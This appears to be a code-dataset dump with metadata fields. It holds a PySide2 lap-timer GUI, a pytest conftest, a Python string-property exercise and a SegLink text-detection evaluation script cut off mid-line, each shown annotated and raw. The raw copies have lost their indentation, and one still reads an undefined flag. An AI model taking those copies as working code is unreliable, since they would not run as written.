        self.ModeRunner.start()
    def StopTiming(self):
        """Stop the lap timer and the run-mode polling loop."""
        self.Tracker.O_Timer.stop_timer()
        self.ModeRunner.stop()
    def ConfigureRunMode(self, mode='circuit'):
        """Wire the ModeRunner timer to the handler for the given mode."""
        if mode == 'circuit':
            self.ModeRunner.timeout.connect(self.Tracker.lapping_mode)
    @staticmethod
    def _format_laptime(seconds):
        """Format a duration in seconds as H:MM:SS.mmm.

        Bug fix: the old code always sliced four characters off
        str(timedelta), which yielded only two decimals and truncated the
        seconds digit entirely for whole-second values (their string form
        has no fractional part).
        """
        formatted = str(datetime.timedelta(seconds=seconds))
        # Trim microseconds down to milliseconds, or append an explicit
        # .000 fraction when there are none.
        return formatted[:-3] if '.' in formatted else formatted + '.000'
    def UpdateClock(self):
        """Refresh the running lap time and append finished laps to the list."""
        _lap_time, _, _, _last_lap_time = self.Tracker.O_Timer.get_all_times()
        if _lap_time != 0:
            _formatted_time1 = self._format_laptime(_lap_time)
        else:
            _formatted_time1 = '0:00:00.000'
        self.LapTimeLbl.setText(_formatted_time1)
        if self.Tracker.O_Timer.is_new_lap:
            _formatted_time2 = self._format_laptime(_last_lap_time)
            self.LapRecordList.insertItem(0, _formatted_time2)
            # NOTE(review): the flag read above is `is_new_lap` but the one
            # cleared here is `is_new_lap_data` — confirm against OmeTracker
            # that these really are two distinct flags.
            self.Tracker.O_Timer.is_new_lap_data = False
    def UpdateGPSBtn(self, style=u"background-color: rgb(255, 255, 255);", text='GPS'):
        """Set the GPS indicator's stylesheet and label.

        Bug fix: the previous default was a bare (255, 255, 255) tuple,
        which is not a valid argument for setStyleSheet().
        """
        self.GPSStatusBtn.setStyleSheet(style)
        self.GPSStatusBtn.setText(text)
    def UpdateCANBtn(self, style=u"background-color: rgb(255, 255, 255);", text='CAN'):
        """Set the CAN indicator's stylesheet and label (same default fix)."""
        self.CANStatusBtn.setStyleSheet(style)
        self.CANStatusBtn.setText(text)
    def UpdateLogBtn(self, style=u"background-color: rgb(255, 255, 255);", text='Log'):
        """Set the logger indicator's stylesheet and label."""
        self.LoggerStatusBtn.setStyleSheet(style)
        self.LoggerStatusBtn.setText(text)
    def UpdateSensor(self):
        """Poll sensor status and refresh the GPS, CAN and logging indicators."""
        _status = self.Tracker.get_sensor_status()
        if not _status['GPS_connected']:
            self.UpdateGPSBtn(u"background-color: rgb(100, 0, 0);", "NO GPS")
        else:
            _txt = 'GPS'
            if not _status['GPS_ready']:
                _txt = 'GGA'
                self.UpdateGPSBtn(
                    u"background-color: rgb(180, 0, 0);", _txt)
            else:
                # Idiom fix: boolean `or` instead of bitwise `|`.
                if (_status['GPS_mode'] == 0) or (_status['GPS_fix_quality'] == 0):
                    _txt = 'NO FIX'
                    self.UpdateGPSBtn(
                        u"background-color: rgb(255, 255, 0);", _txt)
                else:
                    GPS_fix_modes = {'2': '2D', '3': '3D'}
                    GPS_fix_qual = {'1': '', '2': 'D'}
                    # Robustness: fall back to placeholders for unknown
                    # mode/quality values instead of raising on None.
                    _txt = (GPS_fix_modes.get(str(_status['GPS_mode']), '?')
                            + GPS_fix_qual.get(str(_status['GPS_fix_quality']), '')
                            + f":{_status['GPS_sat_count']}")
                    self.UpdateGPSBtn(
                        u"background-color: rgb(0, 255, 0);", _txt)
            _spd = _status['groundspeed']
            if _spd is not None:
                # 2.23693629 converts m/s to mph — assumes groundspeed is
                # reported in m/s (TODO confirm against OmeTracker).
                _spd = "{:.1f}".format(_spd*2.23693629)
                self.GPSspeed.setText(_spd)
            else:
                self.GPSspeed.setText('0.0')
        if not _status['CAN_connected']:
            self.UpdateCANBtn(u"background-color: rgb(100, 0, 0);", "NO CAN")
        else:
            # Bug fix: both of these branches previously updated the GPS
            # indicator (UpdateGPSBtn) instead of the CAN indicator.
            if not _status['CAN_ready']:
                self.UpdateCANBtn(
                    u"background-color: rgb(180, 0, 0);", "NO COMM")
            else:
                self.UpdateCANBtn(
                    u"background-color: rgb(0, 255, 0);", "CAN OK")
        if (_status['Tracker_logging']):
            self.UpdateLogBtn(u"background-color: rgb(0, 255, 0);", "Logging")
        else:
            self.UpdateLogBtn(text="NLOG")
    def OpenConfig(self):
        """Show the configuration window."""
        self.ConfigWindow.show()
    def ExitProg(self):
        """Stop system logging and quit the application."""
        self.Tracker.stop_sys_logging()
        app.exit()
class ConfigWindow(QMainWindow, ConfigGUI):
    """Configuration screen with Return and Exit actions."""
    def __init__(self):
        super().__init__()
        self.setupUi(self)
        # Wire each button to its handler.
        wiring = (
            (self.ExitBtn, self.ExitProg),
            (self.ReturnBtn, self.CloseDialog),
        )
        for button, handler in wiring:
            button.clicked.connect(handler)
    def CloseDialog(self):
        """Close this window and return to the main screen."""
        self.close()
    def ExitProg(self):
        """Terminate the whole application."""
        app.exit()
app = QApplication(sys.argv)
mainWin = MainWindow()
# Bug fix: app.exit(code) called after exec_() has already returned is a
# no-op, so the process always exited with status 0.  sys.exit propagates
# the Qt event loop's return code as the process exit status.
sys.exit(app.exec_())
| from PySide2.QtCore import * # type: ignore
from PySide2.QtGui import * # type: ignore
from PySide2.QtWidgets import * # type: ignore
import sys
import os
from Drivers.OmeTracker import OmeTracker
import numpy as np
import datetime
import time
import csv
from GUI.MainScreen import Ui_MainWindow as MainGUI
from GUI.ConfigPop import Ui_ConfigPop as ConfigGUI
class MainWindow(QMainWindow, MainGUI):
    """Main track-logger screen: lap timer, GPS/CAN status and logging UI."""
    def __init__(self) -> None:
        super().__init__()
        self.setupUi(self)
        self.system = os.uname().nodename
        self.Tracker = OmeTracker()
        # set up subwindows/popups
        self.ConfigWindow = ConfigWindow()
        # set up buttons
        self.StartTimerBtn.clicked.connect(self.StartTiming)
        self.StopTimerBtn.clicked.connect(self.StopTiming)
        self.ConfigBtn.clicked.connect(self.OpenConfig)
        # 20 ms refresh for the lap-time display.
        self.ClockUpdater = QTimer(self)
        self.ClockUpdater.timeout.connect(self.UpdateClock)
        self.ClockUpdater.setInterval(20)
        self.ClockUpdater.start()
        # 100 ms refresh for the GPS/CAN/logging status indicators.
        self.SensorUpdater = QTimer(self)
        self.SensorUpdater.timeout.connect(self.UpdateSensor)
        self.SensorUpdater.start(100)
        self.RunMode = 'circuit'
        self.ModeRunner = QTimer(self)
        self.ModeRunner.setInterval(5)
        self.ConfigureRunMode()
        self.Tracker.start_sys_logging()
        self.StartTiming()
        # Fullscreen only on the in-car Raspberry Pi.
        if self.system == 'raspberrypi':
            self.showFullScreen()
        else:
            self.show()
    def StartTiming(self):
        """Start the lap timer and the run-mode polling loop."""
        self.Tracker.O_Timer.start_timer()
        self.ModeRunner.start()
    def StopTiming(self):
        """Stop the lap timer and the run-mode polling loop."""
        self.Tracker.O_Timer.stop_timer()
        self.ModeRunner.stop()
    def ConfigureRunMode(self, mode='circuit'):
        """Wire the ModeRunner timer to the handler for the given mode."""
        if mode == 'circuit':
            self.ModeRunner.timeout.connect(self.Tracker.lapping_mode)
    @staticmethod
    def _format_laptime(seconds):
        """Format a duration in seconds as H:MM:SS.mmm.

        Bug fix: the old code always sliced four characters off
        str(timedelta), which yielded only two decimals and truncated the
        seconds digit entirely for whole-second values (their string form
        has no fractional part).
        """
        formatted = str(datetime.timedelta(seconds=seconds))
        # Trim microseconds down to milliseconds, or append an explicit
        # .000 fraction when there are none.
        return formatted[:-3] if '.' in formatted else formatted + '.000'
    def UpdateClock(self):
        """Refresh the running lap time and append finished laps to the list."""
        _lap_time, _, _, _last_lap_time = self.Tracker.O_Timer.get_all_times()
        if _lap_time != 0:
            _formatted_time1 = self._format_laptime(_lap_time)
        else:
            _formatted_time1 = '0:00:00.000'
        self.LapTimeLbl.setText(_formatted_time1)
        if self.Tracker.O_Timer.is_new_lap:
            _formatted_time2 = self._format_laptime(_last_lap_time)
            self.LapRecordList.insertItem(0, _formatted_time2)
            # NOTE(review): the flag read above is `is_new_lap` but the one
            # cleared here is `is_new_lap_data` — confirm against OmeTracker
            # that these really are two distinct flags.
            self.Tracker.O_Timer.is_new_lap_data = False
    def UpdateGPSBtn(self, style=u"background-color: rgb(255, 255, 255);", text='GPS'):
        """Set the GPS indicator's stylesheet and label.

        Bug fix: the previous default was a bare (255, 255, 255) tuple,
        which is not a valid argument for setStyleSheet().
        """
        self.GPSStatusBtn.setStyleSheet(style)
        self.GPSStatusBtn.setText(text)
    def UpdateCANBtn(self, style=u"background-color: rgb(255, 255, 255);", text='CAN'):
        """Set the CAN indicator's stylesheet and label (same default fix)."""
        self.CANStatusBtn.setStyleSheet(style)
        self.CANStatusBtn.setText(text)
    def UpdateLogBtn(self, style=u"background-color: rgb(255, 255, 255);", text='Log'):
        """Set the logger indicator's stylesheet and label."""
        self.LoggerStatusBtn.setStyleSheet(style)
        self.LoggerStatusBtn.setText(text)
    def UpdateSensor(self):
        """Poll sensor status and refresh the GPS, CAN and logging indicators."""
        _status = self.Tracker.get_sensor_status()
        if not _status['GPS_connected']:
            self.UpdateGPSBtn(u"background-color: rgb(100, 0, 0);", "NO GPS")
        else:
            _txt = 'GPS'
            if not _status['GPS_ready']:
                _txt = 'GGA'
                self.UpdateGPSBtn(
                    u"background-color: rgb(180, 0, 0);", _txt)
            else:
                # Idiom fix: boolean `or` instead of bitwise `|`.
                if (_status['GPS_mode'] == 0) or (_status['GPS_fix_quality'] == 0):
                    _txt = 'NO FIX'
                    self.UpdateGPSBtn(
                        u"background-color: rgb(255, 255, 0);", _txt)
                else:
                    GPS_fix_modes = {'2': '2D', '3': '3D'}
                    GPS_fix_qual = {'1': '', '2': 'D'}
                    # Robustness: fall back to placeholders for unknown
                    # mode/quality values instead of raising on None.
                    _txt = (GPS_fix_modes.get(str(_status['GPS_mode']), '?')
                            + GPS_fix_qual.get(str(_status['GPS_fix_quality']), '')
                            + f":{_status['GPS_sat_count']}")
                    self.UpdateGPSBtn(
                        u"background-color: rgb(0, 255, 0);", _txt)
            _spd = _status['groundspeed']
            if _spd is not None:
                # 2.23693629 converts m/s to mph — assumes groundspeed is
                # reported in m/s (TODO confirm against OmeTracker).
                _spd = "{:.1f}".format(_spd*2.23693629)
                self.GPSspeed.setText(_spd)
            else:
                self.GPSspeed.setText('0.0')
        if not _status['CAN_connected']:
            self.UpdateCANBtn(u"background-color: rgb(100, 0, 0);", "NO CAN")
        else:
            # Bug fix: both of these branches previously updated the GPS
            # indicator (UpdateGPSBtn) instead of the CAN indicator.
            if not _status['CAN_ready']:
                self.UpdateCANBtn(
                    u"background-color: rgb(180, 0, 0);", "NO COMM")
            else:
                self.UpdateCANBtn(
                    u"background-color: rgb(0, 255, 0);", "CAN OK")
        if (_status['Tracker_logging']):
            self.UpdateLogBtn(u"background-color: rgb(0, 255, 0);", "Logging")
        else:
            self.UpdateLogBtn(text="NLOG")
    def OpenConfig(self):
        """Show the configuration window."""
        self.ConfigWindow.show()
    def ExitProg(self):
        """Stop system logging and quit the application."""
        self.Tracker.stop_sys_logging()
        app.exit()
class ConfigWindow(QMainWindow, ConfigGUI):
    """Configuration screen with Return and Exit actions."""
    def __init__(self):
        super().__init__()
        self.setupUi(self)
        # Wire each button to its handler.
        wiring = (
            (self.ExitBtn, self.ExitProg),
            (self.ReturnBtn, self.CloseDialog),
        )
        for button, handler in wiring:
            button.clicked.connect(handler)
    def CloseDialog(self):
        """Close this window and return to the main screen."""
        self.close()
    def ExitProg(self):
        """Terminate the whole application."""
        app.exit()
app = QApplication(sys.argv)
mainWin = MainWindow()
# Bug fix: app.exit(code) called after exec_() has already returned is a
# no-op, so the process always exited with status 0.  sys.exit propagates
# the Qt event loop's return code as the process exit status.
sys.exit(app.exec_())
tests/conftest.py | vemek/dosage | 0 | 6612367 | # SPDX-License-Identifier: MIT
# Copyright (C) 2019-2022 <NAME>
import time
from pathlib import Path
import pytest
@pytest.fixture()
def _nosleep(monkeypatch):
    """Replace time.sleep with a no-op so tests do not actually wait."""
    def sleep(seconds):
        # Intentionally does nothing; signature mirrors time.sleep.
        pass
    monkeypatch.setattr(time, 'sleep', sleep)
@pytest.fixture()
def _noappdirs(monkeypatch):
    """Point the user plugin path at the bundled mocks/plugins directory."""
    monkeypatch.setattr('dosagelib.cmd.user_plugin_path', Path(__file__).parent / 'mocks' / 'plugins')
| # SPDX-License-Identifier: MIT
# Copyright (C) 2019-2022 <NAME>
import time
from pathlib import Path
import pytest
@pytest.fixture()
def _nosleep(monkeypatch):
    """Replace time.sleep with a no-op so tests do not actually wait."""
    def sleep(seconds):
        # Intentionally does nothing; signature mirrors time.sleep.
        pass
    monkeypatch.setattr(time, 'sleep', sleep)
@pytest.fixture()
def _noappdirs(monkeypatch):
    """Point the user plugin path at the bundled mocks/plugins directory."""
    monkeypatch.setattr('dosagelib.cmd.user_plugin_path', Path(__file__).parent / 'mocks' / 'plugins')
| de | 0.265769 | # SPDX-License-Identifier: MIT # Copyright (C) 2019-2022 <NAME> | 1.640701 | 2 |
Desafios/Mundo 1/ex004.py | ZaikoXander/Python | 0 | 6612368 | from time import sleep
# Read arbitrary text from the user and report which str classification
# predicates it satisfies. The \033[...]m sequences are ANSI color codes
# (styled text on a white background); the messages themselves are
# user-facing Portuguese strings and must stay exactly as written.
data = input('\033[1;30;107mDigite algo:\033[m ')
print('\033[1;35;107mIDENTIFICANDO PROPRIEDADES...\033[m')
sleep(3)  # purely cosmetic pause before showing the results
# input() always returns a str, so this line prints unconditionally.
print('\n\033[1;30;107mÉ string.\033[m')
if data.isnumeric():
    print('\033[1;30;107mÉ numérico.\033[m')
if data.isalpha():
    print('\033[1;30;107mÉ alfabético.\033[m')
if data.isalnum():
    print('\033[1;30;107mÉ alfanumérico.\033[m')
if data.isdigit():
    print('\033[1;30;107mÉ dígito.\033[m')
if data.isdecimal():
    print('\033[1;30;107mÉ decimal.\033[m')
if data.islower():
    print('\033[1;30;107mÉ minúsculo.\033[m')
if data.isspace():
    print('\033[1;30;107mSó tem espaços.\033[m')
if data.isupper():
    print('\033[1;30;107mÉ maiúsculo.\033[m')
if data.istitle():
    print('\033[1;30;107mÉ capitalizado.\033[m')
| from time import sleep
data = input('\033[1;30;107mDigite algo:\033[m ')
print('\033[1;35;107mIDENTIFICANDO PROPRIEDADES...\033[m')
sleep(3)
print('\n\033[1;30;107mÉ string.\033[m')
if data.isnumeric():
print('\033[1;30;107mÉ numérico.\033[m')
if data.isalpha():
print('\033[1;30;107mÉ alfabético.\033[m')
if data.isalnum():
print('\033[1;30;107mÉ alfanumérico.\033[m')
if data.isdigit():
print('\033[1;30;107mÉ dígito.\033[m')
if data.isdecimal():
print('\033[1;30;107mÉ decimal.\033[m')
if data.islower():
print('\033[1;30;107mÉ minúsculo.\033[m')
if data.isspace():
print('\033[1;30;107mSó tem espaços.\033[m')
if data.isupper():
print('\033[1;30;107mÉ maiúsculo.\033[m')
if data.istitle():
print('\033[1;30;107mÉ capitalizado.\033[m')
| none | 1 | 3.506707 | 4 | |
macro_benchmark/SegLink/seglink/evaluate.py | songhappy/ai-matrix | 180 | 6612369 | <gh_stars>100-1000
import os, sys, math, time, logging, random
import tensorflow as tf
import numpy as np
import visualizations
import matplotlib as mpl
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
import joblib
import model
import data
import utils
import ops
FLAGS = tf.app.flags.FLAGS
# logging
# The try/except guards let this module be (re)imported after these flags
# were already registered elsewhere. BUGFIX: the bare `except:` clauses are
# narrowed to `except Exception:` so they no longer swallow SystemExit /
# KeyboardInterrupt.
try:
    tf.app.flags.DEFINE_string('log_dir', '', 'Directory for saving checkpoints and log files')
except Exception:
    print("log_dir has been defined before!")
try:
    tf.app.flags.DEFINE_string('log_prefix', '', 'Log file name prefix')
except Exception:
    print("log_prefix has been defined before!")
# testing
# NOTE(review): keep this flag name in sync with how it is read in
# evaluate() -- the code there refers to a 'test_resize_method' attribute.
tf.app.flags.DEFINE_string('image_resize_method', 'fixed', 'Image resizing method. "fixed" or "dynamic"')
tf.app.flags.DEFINE_string('test_model', '', 'Checkpoint for testing')
tf.app.flags.DEFINE_string('test_dataset', '', 'Test dataset path')
tf.app.flags.DEFINE_integer('test_batch_size', 32, 'Test batch size')
tf.app.flags.DEFINE_integer('num_test', 500, 'Number of test images')
tf.app.flags.DEFINE_float('node_threshold', 0.5, 'Confidence threshold for nodes')
tf.app.flags.DEFINE_float('link_threshold', 0.5, 'Confidence threshold for links')
tf.app.flags.DEFINE_integer('save_vis', 0, 'Save visualization results')
tf.app.flags.DEFINE_string('vis_save_dir', '', 'Visualization save directory')
tf.app.flags.DEFINE_string('result_format', 'icdar_2015_inc', 'Result file format')
tf.app.flags.DEFINE_string('result_suffix', time.strftime('_%Y%m%d_%H%M%S'), 'Result file suffix')
# post processing
tf.app.flags.DEFINE_float('bbox_scale', 1.0, 'Scale output bounding box')
tf.app.flags.DEFINE_float('bbox_min_area', 0, 'Minimum bounding box area')
# intermediate results
tf.app.flags.DEFINE_integer('load_intermediate', 0, 'Whether to load intermediate results.')
# BUGFIX: help text said 'load' (copy-paste) for the save flag.
tf.app.flags.DEFINE_integer('save_intermediate', 0, 'Whether to save intermediate results.')
# useless flags, do not set
try:
    tf.app.flags.DEFINE_string('weight_init_method', 'xavier', 'Weight initialization method')
except Exception:
    print("weight_init_method has been defined before!")
def evaluate():
    """Run SegLink text detection over the test set and write result files.

    Pipeline: build the CPU input/decoding graph, restore the checkpoint,
    run every test batch (or load cached batch outputs), then dispatch to
    the result writer selected by FLAGS.result_format.
    """
    with tf.device('/cpu:0'):
        # input data
        streams = data.input_stream(FLAGS.test_dataset)
        pstreams = data.test_preprocess(streams)
        # BUGFIX: the flag registered above is 'image_resize_method'; the
        # original read FLAGS.test_resize_method, which is not defined in
        # this file and would fail at runtime.
        if FLAGS.image_resize_method == 'dynamic':
            # each test image is resized to a different size, so batching
            # needs dynamic padding and a batch size of exactly 1
            if FLAGS.test_batch_size != 1:
                raise ValueError('dynamic resizing requires test_batch_size == 1')
            batches = tf.train.batch(pstreams,
                                    FLAGS.test_batch_size,
                                    capacity=1000,
                                    num_threads=1,
                                    dynamic_pad=True)
        else:
            # resize every image to the same size
            batches = tf.train.batch(pstreams,
                                    FLAGS.test_batch_size,
                                    capacity=1000,
                                    num_threads=1)
        image_size = tf.shape(batches['image'])[1:3]
        fetches = {}
        fetches['images'] = batches['image']
        fetches['image_name'] = batches['image_name']
        fetches['resize_size'] = batches['resize_size']
        fetches['orig_size'] = batches['orig_size']
        # detector network producing per-layer (cls, link, reg) maps
        detector = model.SegLinkDetector()
        all_maps = detector.build_model(batches['image'])
        # decode local predictions layer by layer
        all_nodes, all_links, all_reg = [], [], []
        for i, maps in enumerate(all_maps):
            cls_maps, lnk_maps, reg_maps = maps
            reg_maps = tf.multiply(reg_maps, data.OFFSET_VARIANCE)
            # segment (node) classification: softmax over the 2 classes
            cls_prob = tf.nn.softmax(tf.reshape(cls_maps, [-1, 2]))
            cls_pos_prob = cls_prob[:, model.POS_LABEL]
            cls_pos_prob_maps = tf.reshape(cls_pos_prob, tf.shape(cls_maps)[:3])
            # node status is 1 where probability is higher than threshold
            node_labels = tf.cast(tf.greater_equal(cls_pos_prob_maps, FLAGS.node_threshold),
                                  tf.int32)
            # link classification
            lnk_prob = tf.nn.softmax(tf.reshape(lnk_maps, [-1, 2]))
            lnk_pos_prob = lnk_prob[:, model.POS_LABEL]
            lnk_shape = tf.shape(lnk_maps)
            lnk_pos_prob_maps = tf.reshape(lnk_pos_prob,
                                           [lnk_shape[0], lnk_shape[1], lnk_shape[2], -1])
            # link status is 1 where probability is higher than threshold
            link_labels = tf.cast(tf.greater_equal(lnk_pos_prob_maps, FLAGS.link_threshold),
                                  tf.int32)
            all_nodes.append(node_labels)
            all_links.append(link_labels)
            all_reg.append(reg_maps)
            fetches['link_labels_%d' % i] = link_labels
        # decode segments and links across all layers
        segments, group_indices, segment_counts = ops.decode_segments_links(
            image_size, all_nodes, all_links, all_reg,
            anchor_sizes=list(detector.anchor_sizes))
        fetches['segments'] = segments
        fetches['group_indices'] = group_indices
        fetches['segment_counts'] = segment_counts
        # combine linked segments into whole-text rotated boxes
        combined_rboxes, combined_counts = ops.combine_segments(
            segments, group_indices, segment_counts)
        fetches['combined_rboxes'] = combined_rboxes
        fetches['combined_counts'] = combined_counts
    sess_config = tf.ConfigProto()
    with tf.Session(config=sess_config) as sess:
        # restore trained weights
        model_loader = tf.train.Saver()
        model_loader.restore(sess, FLAGS.test_model)
        batch_size = FLAGS.test_batch_size
        n_batches = int(math.ceil(FLAGS.num_test / batch_size))
        # per-run result directory
        result_dir = os.path.join(FLAGS.log_dir, 'results' + FLAGS.result_suffix)
        utils.mkdir_if_not_exist(result_dir)
        intermediate_result_path = os.path.join(FLAGS.log_dir, 'intermediate.pkl')
        if FLAGS.load_intermediate:
            all_batches = joblib.load(intermediate_result_path)
            logging.info('Intermediate result loaded from {}'.format(intermediate_result_path))
        else:
            # run all batches and store the raw outputs for post-processing
            all_batches = []
            with slim.queues.QueueRunners(sess):
                for i in range(n_batches):
                    if i % 10 == 0:
                        logging.info('Evaluating batch %d/%d' % (i+1, n_batches))
                    sess_outputs = sess.run(fetches)
                    all_batches.append(sess_outputs)
            if FLAGS.save_intermediate:
                joblib.dump(all_batches, intermediate_result_path, compress=5)
                logging.info('Intermediate result saved to {}'.format(intermediate_result_path))
        if FLAGS.result_format == 'icdar_2015_inc':
            postprocess_and_write_results_ic15(all_batches, result_dir)
        elif FLAGS.result_format == 'icdar_2013':
            postprocess_and_write_results_ic13(all_batches, result_dir)
        else:
            logging.critical('Unknown result format: {}'.format(FLAGS.result_format))
            sys.exit(1)
    logging.info('Evaluation done.')
def postprocess_and_write_results_ic15(all_batches, result_dir):
    """Convert combined rboxes into polygons and write ICDAR-2015 files.

    For each test image a 'res_<name>.txt' is written to result_dir with
    one comma-separated 8-value polygon per line (deduplicated); finally
    the whole result directory is zipped.
    """
    test_count = 0
    for batch in all_batches:
        for i in range(FLAGS.test_batch_size):
            # the last batch may contain duplicates
            # BUGFIX: the original used `>` which let one extra image
            # through (images 0..num_test inclusive = num_test + 1).
            if test_count >= FLAGS.num_test: break
            rboxes = batch['combined_rboxes'][i]
            count = batch['combined_counts'][i]
            rboxes = rboxes[:count, :]
            # post processing: scale box width/height (rbox columns 3:5)
            if FLAGS.bbox_scale > 1.0:
                rboxes[:, 3:5] *= FLAGS.bbox_scale
            # convert rboxes to polygons and map the coordinates back onto
            # the original (pre-resize) image
            orig_h, orig_w = batch['orig_size'][i]
            resize_h, resize_w = batch['resize_size'][i]
            polygons = utils.rboxes_to_polygons(rboxes)
            scale_y = float(orig_h) / float(resize_h)
            scale_x = float(orig_w) / float(resize_w)
            # confine polygons inside image
            polygons[:, ::2] = np.maximum(0, np.minimum(polygons[:, ::2] * scale_x, orig_w-1))
            polygons[:, 1::2] = np.maximum(0, np.minimum(polygons[:, 1::2] * scale_y, orig_h-1))
            polygons = np.round(polygons).astype(np.int32)
            # write results to a per-image text file
            image_name = batch['image_name'][i].decode('ascii')
            result_fname = 'res_{}.txt'.format(os.path.splitext(image_name)[0])
            save_path = os.path.join(result_dir, result_fname)
            with open(save_path, 'w') as f:
                lines = []
                for k in range(polygons.shape[0]):
                    lines.append(','.join(str(o) for o in polygons[k]))
                # remove duplicated lines
                lines = list(frozenset(lines))
                f.write('\r\n'.join(lines))
            test_count += 1
    # compress results into a single zip file
    # NOTE(review): cmd is built from flag-derived paths; subprocess.run
    # with a list would be safer than os.system if paths may contain spaces.
    result_dir_name = 'results' + FLAGS.result_suffix
    cmd = "zip -rj {}.zip {}".format(os.path.join(result_dir, '..', result_dir_name),
                                     result_dir)
    logging.info('Executing {}'.format(cmd))
    os.system(cmd)
def postprocess_and_write_results_ic13(all_batches, result_dir):
    """Write ICDAR-2013 style axis-aligned bbox results (UNFINISHED).

    BUGFIX: the signature now matches the call site in evaluate(), which
    passes (all_batches, result_dir); the original one-argument form
    raised TypeError before even reaching the NotImplementedError.
    """
    raise NotImplementedError('This function needs revision')
    # ------------------------------------------------------------------
    # Unreachable draft code below, kept as a starting point for the
    # eventual implementation. It still references names that are not
    # defined in this scope (sess_outputs, batch_size, ...).
    # ------------------------------------------------------------------
    for j in range(batch_size):
        # convert detection results
        rboxes = sess_outputs['combined_rboxes'][j]
        count = sess_outputs['combined_counts'][j]
        orig_h, orig_w = sess_outputs['orig_size'][j]
        resize_h, resize_w = sess_outputs['resize_size'][j]
        bboxes = utils.rboxes_to_bboxes(rboxes[:count, :])
        # bbox scaling trick
        bbox_scale = FLAGS.bbox_scale
        bboxes_width = bboxes[:,2] - bboxes[:,0]
        bboxes_height = bboxes[:,3] - bboxes[:,1]
        bboxes[:,0] -= 0.5 * bbox_scale * bboxes_width
        bboxes[:,1] -= 0.5 * bbox_scale * bboxes_height
        bboxes[:,2] += 0.5 * bbox_scale * bboxes_width
        bboxes[:,3] += 0.5 * bbox_scale * bboxes_height
        scale_y = float(orig_h) / float(resize_h)
        scale_x = float(orig_w) / float(resize_w)
        bboxes[:, ::2] = np.maximum(0, np.minimum(bboxes[:, ::2] * scale_x, orig_w-1))
        bboxes[:, 1::2] = np.maximum(0, np.minimum(bboxes[:, 1::2] * scale_y, orig_h-1))
        bboxes = np.round(bboxes).astype(np.int32)
        # write results to text files
        image_name = str(sess_outputs['image_name'][j])
        result_fname = 'res_' + os.path.splitext(image_name)[0] + '.txt'
        orig_size = sess_outputs['orig_size'][j]
        save_path = os.path.join(result_dir, result_fname)
        with open(save_path, 'w') as f:
            lines = []
            for k in range(bboxes.shape[0]):
                bbox_str = list(bboxes[k])
                bbox_str = [str(o) for o in bbox_str]
                bbox_str = ','.join(bbox_str)
                lines.append(bbox_str)
            # remove duplicated lines
            lines = list(set(lines))
            f.write('\r\n'.join(lines))
        # save images and lexicon list for post-processing
        if FLAGS.save_image_and_lexicon:
            sess_outputs['']
if __name__ == '__main__':
    # create the logging dir if it does not exist yet
    utils.mkdir_if_not_exist(FLAGS.log_dir)
    # set up logging: one timestamped log file per run under log_dir
    log_file_name = FLAGS.log_prefix + time.strftime('%Y%m%d_%H%M%S') + '.log'
    log_file_path = os.path.join(FLAGS.log_dir, log_file_name)
    utils.setup_logger(log_file_path)
    utils.log_flags(FLAGS)  # record all flag values in the log
    #utils.log_git_version()
    # run test
    evaluate()
| import os, sys, math, time, logging, random
import tensorflow as tf
import numpy as np
import visualizations
import matplotlib as mpl
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
import joblib
import model
import data
import utils
import ops
FLAGS = tf.app.flags.FLAGS
# logging
try:
tf.app.flags.DEFINE_string('log_dir', '', 'Directory for saving checkpoints and log files')
except:
print("log_dir has been defined before!")
try:
tf.app.flags.DEFINE_string('log_prefix', '', 'Log file name prefix')
except:
print("log_prefix has been defined before!")
# testing
tf.app.flags.DEFINE_string('image_resize_method', 'fixed', 'Image resizing method. "fixed" or "dynamic"')
tf.app.flags.DEFINE_string('test_model', '', 'Checkpoint for testing')
tf.app.flags.DEFINE_string('test_dataset', '', 'Test dataset path')
tf.app.flags.DEFINE_integer('test_batch_size', 32, 'Test batch size')
tf.app.flags.DEFINE_integer('num_test', 500, 'Number of test images')
tf.app.flags.DEFINE_float('node_threshold', 0.5, 'Confidence threshold for nodes')
tf.app.flags.DEFINE_float('link_threshold', 0.5, 'Confidence threshold for links')
tf.app.flags.DEFINE_integer('save_vis', 0, 'Save visualization results')
tf.app.flags.DEFINE_string('vis_save_dir', '', 'Visualization save directory')
tf.app.flags.DEFINE_string('result_format', 'icdar_2015_inc', 'Result file format')
tf.app.flags.DEFINE_string('result_suffix', time.strftime('_%Y%m%d_%H%M%S'), 'Result file suffix')
# post processing
tf.app.flags.DEFINE_float('bbox_scale', 1.0, 'Scale output bounding box')
tf.app.flags.DEFINE_float('bbox_min_area', 0, 'Minimum bounding box area')
# intermediate results
tf.app.flags.DEFINE_integer('load_intermediate', 0, 'Whether to load intermediate results.')
tf.app.flags.DEFINE_integer('save_intermediate', 0, 'Whether to load intermediate results.')
# useless flags, do not set
try:
tf.app.flags.DEFINE_string('weight_init_method', 'xavier', 'Weight initialization method')
except:
print("weight_init_method has been defined before!")
def evaluate():
with tf.device('/cpu:0'):
# input data
streams = data.input_stream(FLAGS.test_dataset)
pstreams = data.test_preprocess(streams)
if FLAGS.test_resize_method == 'dynamic':
# each test image is resized to a different size
# test batch size must be 1
assert(FLAGS.test_batch_size == 1)
batches = tf.train.batch(pstreams,
FLAGS.test_batch_size,
capacity=1000,
num_threads=1,
dynamic_pad=True)
else:
# resize every image to the same size
batches = tf.train.batch(pstreams,
FLAGS.test_batch_size,
capacity=1000,
num_threads=1)
image_size = tf.shape(batches['image'])[1:3]
fetches = {}
fetches['images'] = batches['image']
fetches['image_name'] = batches['image_name']
fetches['resize_size'] = batches['resize_size']
fetches['orig_size'] = batches['orig_size']
# detector
detector = model.SegLinkDetector()
all_maps = detector.build_model(batches['image'])
# decode local predictions
all_nodes, all_links, all_reg = [], [], []
for i, maps in enumerate(all_maps):
cls_maps, lnk_maps, reg_maps = maps
reg_maps = tf.multiply(reg_maps, data.OFFSET_VARIANCE)
# segments classification
cls_prob = tf.nn.softmax(tf.reshape(cls_maps, [-1, 2]))
cls_pos_prob = cls_prob[:, model.POS_LABEL]
cls_pos_prob_maps = tf.reshape(cls_pos_prob, tf.shape(cls_maps)[:3])
# node status is 1 where probability is higher than threshold
node_labels = tf.cast(tf.greater_equal(cls_pos_prob_maps, FLAGS.node_threshold),
tf.int32)
# link classification
lnk_prob = tf.nn.softmax(tf.reshape(lnk_maps, [-1, 2]))
lnk_pos_prob = lnk_prob[:, model.POS_LABEL]
lnk_shape = tf.shape(lnk_maps)
lnk_pos_prob_maps = tf.reshape(lnk_pos_prob,
